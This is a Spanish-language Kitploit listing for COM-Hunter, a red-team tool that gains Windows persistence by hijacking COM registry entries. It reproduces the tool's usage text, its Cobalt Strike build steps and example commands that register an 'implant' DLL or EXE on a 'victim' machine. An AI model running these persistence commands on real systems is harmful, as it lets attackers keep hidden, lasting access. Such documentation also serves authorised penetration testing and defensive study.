Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
COM-Hunter — Herramienta de persistencia mediante secuestro de COM de Windows con modos de búsqueda, clásico, Programador de tareas y TreatAs. Disponible como ejecutable .NET y BOF de Cobalt Strike para operaciones de equipo rojo. | Kitploit
Herramientas/GitHubGitHub/nickvourd/com-hunter
Escalada de PrivilegiosMecanismos de PersistenciaPruebas de PenetraciónRed Teaming
GitHubnickvourd/com-hunter

COM-Hunter

Herramienta de persistencia mediante secuestro de COM de Windows con modos de búsqueda, clásico, Programador de tareas y TreatAs. Disponible como ejecutable .NET y BOF de Cobalt Strike para operaciones de equipo rojo.

Ver Repositorio
388613hace 8 díasRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

COM-Hunter

COM Hijacking VOODOO



GitHub License GitHub Repo stars
GitHub forks GitHub watchers GitHub contributors

Descripción

COM-Hunter es una herramienta de persistencia mediante COM Hijacking.

Disponible tanto en una versión .NET como en una variante BOF totalmente compatible con Cobalt Strike.

Static Badge Static Badge Static Badge

La siguiente lista explica los modos disponibles:

  • Modo Búsqueda: Busca CLSIDs basados en LocalServer32, InprocServer32 y entradas de registro tanto en HKLM como en HKCU.
  • Modo Persistencia Clásica: Realiza persistencia por COM hijacking clásica usando LocalServer32 o InprocServer32.
  • Modo Programador de Tareas: Establece automáticamente persistencia por COM hijacking mediante el Programador de Tareas usando LocalServer32 o InprocServer32.
  • Modo TreatAs: Realiza persistencia por COM hijacking a través de la clave de registro TreatAs y un CLSID falso (redirigible) usando LocalServer32 o InprocServer32.
  • Modo Eliminar: Elimina los mecanismos de persistencia que dependen de LocalServer32, InprocServer32 y entradas de registro relacionadas tanto en como en .

ℹ️ Esta herramienta ha sido seleccionada y forma parte con orgullo del Cobalt Strike Community Kit.

Si encuentras algún error, no dudes en reportarlo. ¡Tus comentarios son valiosos para mejorar la calidad de este proyecto!

Descargo de responsabilidad

Los autores y colaboradores de este proyecto no son responsables por el uso ilegal de la herramienta. Está destinada únicamente a fines educativos. Los usuarios son responsables de garantizar un uso conforme a la ley.

Índice de contenidos

  • COM-Hunter
    • Descripción
    • Descargo de responsabilidad
    • Índice de contenidos
    • Agradecimientos
    • Uso
    • Ejemplos .NET
    • Implementación BOF
    • Referencias

Agradecimientos

Este proyecto fue creado con ❤️ por @nickvourd && @S1ckB0y1337.

Un agradecimiento especial a mi amigo Marios Gyftos por su invaluable ayuda durante la fase de pruebas beta de esta herramienta.

Inspirado en el curso RTO de @zeropointsecltd.

La implementación BOF está inspirada en Lefteris Panos y su increíble proyecto RegPersist.

Los archivos base.c y bofdefs.h son copias directas del proyecto TrustedSec's CS-Situational-Awareness-BOF.

Uso

root@kitploit:~
 ██████╗ ██████╗ ███╗   ███╗      ██╗  ██╗██╗   ██╗███╗   ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║      ██║  ██║██║   ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗
██║     ██║   ██║██╔████╔██║█████╗███████║██║   ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝
██║     ██║   ██║██║╚██╔╝██║╚════╝██╔══██║██║   ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║      ██║  ██║╚██████╔╝██║ ╚████║   ██║   ███████╗██║  ██║
 ╚═════╝ ╚═════╝ ╚═╝     ╚═╝      ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝

                                   Versión: 3.0
                             @nickvourd && @S1ckB0y1337
                  ~ Inspirado durante el curso RTO por @zeropointsecltd ~

Uso: COM_Hunter.exe <modo> <opciones>

[+] Modos disponibles:
    search             Modo Búsqueda
    persist            Modo Persistencia Clásica
    tasksch            Modo Programador de Tareas
    treatas            Modo TreatAs
    remove             Modo Eliminar

[+] Modo Búsqueda:
Uso:  COM-Hunter.exe search <CLSID> <opciones>
    -a, --all                   Buscar implementaciones DLL y EXE en HKLM y HKCU
    -i, --inprocserver32        Buscar implementaciones DLL en HKLM y HKCU
    -l, --localserver32         Buscar implementaciones EXE en HKLM y HKCU
    -m, --machine               Buscar implementaciones DLL y EXE en HKLM
    -u, --user                  Buscar implementaciones DLL y EXE en HKCU

[+] Modo Persistencia Clásica:
Uso:  COM-Hunter.exe persist <CLSID> <ruta_del_binario> <opción>
    -i, --inprocserver32        Establecer implementación DLL
    -l, --localserver32         Establecer implementación EXE

[+] Modo Programador de Tareas:
Uso:  COM-Hunter.exe tasksch <ruta_del_binario> <opción>
    -i, --inprocserver32        Establecer implementación DLL
    -l, --localserver32         Establecer implementación EXE

[+] Modo TreatAs:
Uso:  COM-Hunter.exe treatas <CLSID> <CLSID_falso> <ruta_del_binario> <opción>
    -i, --inprocserver32        Establecer implementación DLL
    -l, --localserver32         Establecer implementación EXE

[+] Modo Eliminar:
Uso:  COM-Hunter.exe remove <CLSID> <opciones>
    -a, --all                   Eliminar implementaciones DLL y EXE en HKLM y HKCU
    -i, --inprocserver32        Eliminar implementaciones DLL en HKLM y HKCU
    -l, --localserver32         Eliminar implementaciones EXE en HKLM y HKCU
    -m, --machine               Eliminar implementaciones DLL y EXE en HKLM
    -u, --user                  Eliminar implementaciones DLL y EXE en HKCU

Ejemplos .NET

ℹ️ Buscar implementaciones DLL y EXE en HKLM y HKCU:

root@kitploit:~
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a

ℹ️ Buscar implementaciones EXE en HKLM y HKCU:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l

ℹ️ Búsqueda avanzada de implementaciones EXE en HKLM:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine

ℹ️ Buscar implementaciones EXE y DLL en HKCU:

root@kitploit:~
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user

ℹ️ Realizar persistencia clásica usando implementación DLL:

root@kitploit:~
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i

ℹ️ Realizar persistencia clásica usando implementación EXE:

root@kitploit:~
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32

ℹ️ Realizar persistencia mediante el Programador de Tareas usando implementación DLL:

root@kitploit:~
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32

ℹ️ Realizar persistencia a través de la clave de registro TreatAs y un CLSID falso (redirigible) usando implementación DLL:

root@kitploit:~
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i

ℹ️ Eliminar persistencia de implementación DLL en HKCU usando:

root@kitploit:~
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u

Implementación BOF

ℹ️ Se requiere el toolchain MinGW-w64 (x86_64-w64-mingw32-gcc y i686-w64-mingw32-gcc)

ℹ️ Compila los objetos BOF para ambas arquitecturas:

root@kitploit:~
./make_all.sh

Esto:

  1. Creará los directorios com_hunter_*.
  2. Compilará com_hunter_*.x64.o y com_hunter_*.x86.o.
  3. Moverá ambos archivos objeto a los directorios com_hunter_*/.

ℹ️ Después de compilar los módulos BOF, simplemente carga com_hunter_bof.cna en Cobalt Strike.

ℹ️ Para limpiar los artefactos de compilación, ve a cada directorio src y ejecuta:

root@kitploit:~
make clean

Referencias

  • Persistencia: “la existencia continuada o prolongada de algo”: Parte 2 – COM Hijacking por MDSec
  • Abusando de la estructura de registro COM (Parte 2): Técnicas de secuestro y carga por BOHOPS
  • Persistencia a nivel de usuario con tareas programadas y secuestro de controladores COM por Enigma0x3
  • Secuestro de objetos COM por Virus Total
  • Repositorio GitHub CS-Remote-OPs-BOF de TrustedSec
  • Introducción para desarrolladores a los archivos objeto Beacon por TrustedSec
  • Curso de desarrollo y técnicas de BOF por Zeropoint Security
Descargar herramienta
HKLM
HKCU